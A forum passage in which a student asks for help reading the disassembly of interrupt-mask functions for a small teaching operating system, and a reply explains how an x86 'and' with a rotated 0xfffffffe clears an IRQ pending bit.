void eos_enable_irq_line(int32u_t irq) {
/* turn off the corresponding bit */
_irq_mask &= ~(0x1<<irq);
}
so these functions do ack and get and mask and unmask an interrupt request. and i'm stuck at the first one. so if you are mercy enough, would you please get me some hint or answer to analyze the first function? i'll try to get the others... and i'm very sorry for another homework.. (my TA doesn't look email)
21 05 00 00 00 00 (that and) is actually an and with a memory operand (namely and [0], eax) which the AT&T syntax obscures (but technically it does say that, note the absence of a $ sign). It makes more sense that way (the offset of 0 suggests you didn't link the code before disassembling).
mov $0xfffffffe, %eax is doing exactly what it looks like it's doing (note that 0xfffffffe is all ones except the lowest bit), and that means the function has been implemented like this:
_irq_pending &= rotate_left(0xFFFFFFFE, irq);
Saving a not operation. It has to be a rotate there instead of a shift in order to make the low bits 1 if necessary.

Resources